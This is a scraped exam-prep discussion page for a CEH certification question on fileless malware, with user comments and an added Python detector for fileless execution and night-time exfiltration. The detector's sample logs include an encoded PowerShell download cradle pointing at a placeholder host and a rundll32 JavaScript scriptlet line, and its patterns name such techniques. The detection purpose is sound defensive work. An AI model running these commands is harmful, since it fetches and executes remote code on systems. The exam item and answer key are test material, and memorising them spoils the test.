Exam 312-50v11 topic 1 question 164 discussion

Actual exam question from ECCouncil's 312-50v11
Question #: 164
Topic #: 1

Security administrator John Smith has noticed abnormal amounts of traffic coming from local computers at night. Upon reviewing, he finds that user data have been exfiltrated by an attacker. AV tools are unable to find any malicious software, and the IDS/IPS has not reported on any non-whitelisted programs.
What type of malware did the attacker use to bypass the company's application whitelisting?

  • A. File-less malware
  • B. Zero-day malware
  • C. Phishing malware
  • D. Logic bomb malware
Suggested Answer: A

Comments

cerzocuspi
Highly Voted 2 years ago
IDS/IPS has not reported on any non-whitelisted programs. File-less malware
upvoted 9 times
Animal22
Highly Voted 10 months, 2 weeks ago
It can't be "zero-day" malware because the company is whitelisting applications. That means that NOTHING can run unless it has been expressly allowed. It doesn't matter if the exploit / malware is known or not. It can't run because it is not whitelisted. File-less malware is attached to another file. In this case, one that is whitelisted.
upvoted 6 times
Daniel8660
Most Recent 6 months, 3 weeks ago
Selected Answer: A
Fileless Malware: Fileless malware can easily evade various security controls; organizations need to focus on monitoring, detecting, and preventing malicious activities instead of using traditional approaches such as scanning for malware through file signatures. Also known as non-malware, it infects legitimate software, applications, and other protocols existing in the system to perform various malicious activities. It resides in the system's RAM. It injects malicious code into the running processes. (P.966/950)
upvoted 5 times
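The behaviour-based monitoring Daniel8660's comment recommends, applied to the scenario in the question, as an added example; this is not code from the original page or from EC-Council's material. It assumes Sysmon-style process-creation events and per-host outbound flow summaries in a constructed pipe-delimited format, and the indicator list, script-host list, night window, byte threshold, hostnames and addresses are all illustrative. It goes slightly beyond the question by correlating two signals: a whitelisted interpreter launched with its payload on the command line or in memory (so no new executable ever reaches the whitelisting tool or the AV scanner), and after-hours egress from the same host.

```python
# Added example (not from the page or EC-Council): behaviour-based triage for
# fileless execution plus after-hours egress, run over constructed sample logs.
import base64
import re
from collections import defaultdict
from datetime import datetime, time

# Signed, whitelisted binaries that fileless tooling runs inside of. Illustrative.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Command-line traits showing the payload lives in memory or on the command
# line rather than in a file an AV scanner could hash. Illustrative patterns.
INDICATORS = [
    ("encoded_command", re.compile(r"(?i)\s-(enc|encodedcommand|e)\s+[A-Za-z0-9+/=]{20,}")),
    ("download_cradle", re.compile(r"(?i)\b(DownloadString|DownloadFile|Invoke-WebRequest|IEX|Invoke-Expression)\b")),
    ("remote_scriptlet", re.compile(r"(?i)scrobj\.dll|javascript:|vbscript:|\.sct\b")),
    ("hidden_window", re.compile(r"(?i)\s-(w|windowstyle)\s+hidden")),
]
NIGHT_START, NIGHT_END = time(22, 0), time(6, 0)  # assumed "at night" window

def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def decode_encoded_command(cmdline):
    """Recover the plaintext of a PowerShell -EncodedCommand (base64 of UTF-16LE)."""
    m = re.search(r"(?i)\s-(?:enc|encodedcommand|e)\s+([A-Za-z0-9+/=]{20,})", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_process_event(ev):
    """Indicator names one process-creation event triggers ([] for benign use)."""
    if _basename(ev["image"]) not in SCRIPT_HOSTS:
        return []
    hits = [tag for tag, rx in INDICATORS if rx.search(ev["cmdline"])]
    decoded = decode_encoded_command(ev["cmdline"])
    if decoded:  # the download cradle usually hides inside the encoded blob
        hits += ["decoded:" + tag for tag, rx in INDICATORS
                 if tag != "encoded_command" and rx.search(decoded)]
    if _basename(ev["parent"]) in OFFICE_PARENTS:
        hits.append("office_parent")  # macro -> script host is a classic chain
    return hits

def parse_records(lines, fields):
    """Parse constructed pipe-delimited log lines into dicts; 'ts' becomes a datetime."""
    out = []
    for line in lines:
        if line.strip() and not line.startswith("#"):
            rec = dict(zip(fields, line.split("|", len(fields) - 1)))
            rec["ts"] = datetime.fromisoformat(rec["ts"])
            out.append(rec)
    return out

def after_hours_egress(flows, min_bytes=50_000_000):
    """Hosts whose night-time outbound bytes are large and exceed their daytime bytes."""
    night, day = defaultdict(int), defaultdict(int)
    for f in flows:
        t = f["ts"].time()
        bucket = night if (t >= NIGHT_START or t < NIGHT_END) else day
        bucket[f["host"]] += int(f["bytes"])
    return {h: b for h, b in night.items() if b >= min_bytes and b > day[h]}

def triage(process_lines, flow_lines):
    """Correlate fileless-execution indicators with after-hours egress, per host."""
    hits_by_host = defaultdict(list)
    for ev in parse_records(process_lines, ["ts", "host", "parent", "image", "cmdline"]):
        hits = score_process_event(ev)
        if hits:
            hits_by_host[ev["host"]].append(
                (ev["ts"].isoformat(timespec="minutes"), _basename(ev["image"]), hits))
    egress = after_hours_egress(parse_records(flow_lines, ["ts", "host", "dst", "bytes"]))
    return {h: {"fileless_indicators": hits_by_host.get(h, []),
                "after_hours_bytes": egress.get(h, 0),
                "priority": "high" if h in hits_by_host and h in egress else "medium"}
            for h in sorted(set(hits_by_host) | set(egress))}

# Constructed sample: a Word macro launches a hidden, encoded PowerShell stager
# that pulls a script straight into memory; a scheduled backup uses the same
# whitelisted binary legitimately. Hosts and addresses are fictitious.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage.ps1')"
    .encode("utf-16-le")).decode()
PROCESS_LOG = f"""
2024-03-04T23:41:00|WS-017|C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -NoP -W Hidden -Enc {ENCODED}
2024-03-04T23:42:00|WS-017|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|C:\\Windows\\System32\\rundll32.exe|rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();
2024-03-04T10:05:00|WS-042|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -File C:\\scripts\\backup.ps1
""".splitlines()
FLOW_LOG = """
2024-03-04T11:00:00|WS-017|198.51.100.20|2400000
2024-03-04T14:30:00|WS-017|198.51.100.20|1800000
2024-03-05T01:10:00|WS-017|203.0.113.5|310000000
2024-03-05T02:40:00|WS-017|203.0.113.5|295000000
2024-03-05T00:30:00|WS-042|198.51.100.40|900000
2024-03-05T01:00:00|WS-099|198.51.100.40|75000000
""".splitlines()
```

Running `triage(PROCESS_LOG, FLOW_LOG)` reports WS-017 as high priority (encoded, hidden PowerShell spawned by Word whose decoded payload is a download cradle, then a rundll32 JavaScript scriptlet, plus roughly 600 MB out overnight) and WS-099 as medium (night egress with no execution indicator), while the daytime `-File backup.ps1` run on WS-042 produces nothing. Note what a whitelisting tool or signature scanner sees in the WS-017 chain: only powershell.exe and rundll32.exe, both signed and allowed; the stager exists nowhere on disk, which is why the decode step, not a file hash, is what exposes it.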
pinguin666
10 months ago
At first I would have sworn zero-day, but reading it again and again, the keyword is "bypass the company's application whitelisting"; that would point at fileless.
upvoted 4 times
Novmejst
1 year, 4 months ago
A. File-less malware
upvoted 1 times
martco
1 year, 5 months ago
Terminology: there is no "zero-day malware", it's just "malware", which of course could be introduced as a component of a zero-day exploit campaign by an expert who correctly identifies a zero-day vulnerability in the system to be attacked.
upvoted 3 times
jinjection
1 year, 6 months ago
Makes no sense; it can be zero-day malware too......
upvoted 3 times
whysoserious1199
1 year, 8 months ago
Fileless malware and zero-day are both correct... depends on which answer EC-Council likes more..
upvoted 3 times
brdweek
1 year, 6 months ago
IDS/IPS has not reported on any non-whitelisted programs
upvoted 2 times
M4E_55
1 year, 9 months ago
Why not zero-day? Antivirus or IDS cannot detect if it's a new one and they don't have signatures...
upvoted 1 times
beowolf
1 year, 7 months ago
in some cases it can detect based on behavior
upvoted 1 times
spydog
1 year, 6 months ago
I believe there is no such thing as zero-day malware. There is a zero-day exploit/vulnerability, but there is no definition for zero-day malware.
upvoted 4 times
HayatoK
1 year, 9 months ago
IDS monitors traffic on the network, so you should be able to find any unusual communications, but why can't you find fileless malware?
upvoted 1 times
ANDRESCB1988
1 year, 9 months ago
correct
upvoted 1 times
Grezavi
1 year, 10 months ago
https://www.mcafee.com/enterprise/en-us/security-awareness/ransomware/what-is-fileless-malware.html
upvoted 1 times
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted